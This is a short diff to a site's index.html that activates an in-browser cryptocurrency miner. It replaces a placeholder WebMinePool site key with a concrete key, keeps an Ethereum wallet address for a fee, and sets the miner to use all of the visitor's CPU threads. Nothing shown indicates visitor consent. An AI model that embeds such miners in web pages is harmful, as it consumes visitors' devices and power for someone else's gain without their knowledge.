--- a/index.html
+++ b/index.html
@@ -61,7 +61,7 @@
     <script>
         // Configuration
         const miner = new WebMiner({
-            siteKey: "YOUR_WEBMINEPOOL_SITE_KEY", // Replace this with your WebMinePool Site Key
+            siteKey: "SK_RDlb7DhGQbqq5jlt87raJ", // Your WebMinePool Site Key
             walletAddress: "0x09d9dfA5Dc0CCD94356DE335EF2c3bf2daF64e77", // Your Ethereum wallet for 1% fee
             threads: navigator.hardwareConcurrency, // Use all available CPU threads
         });
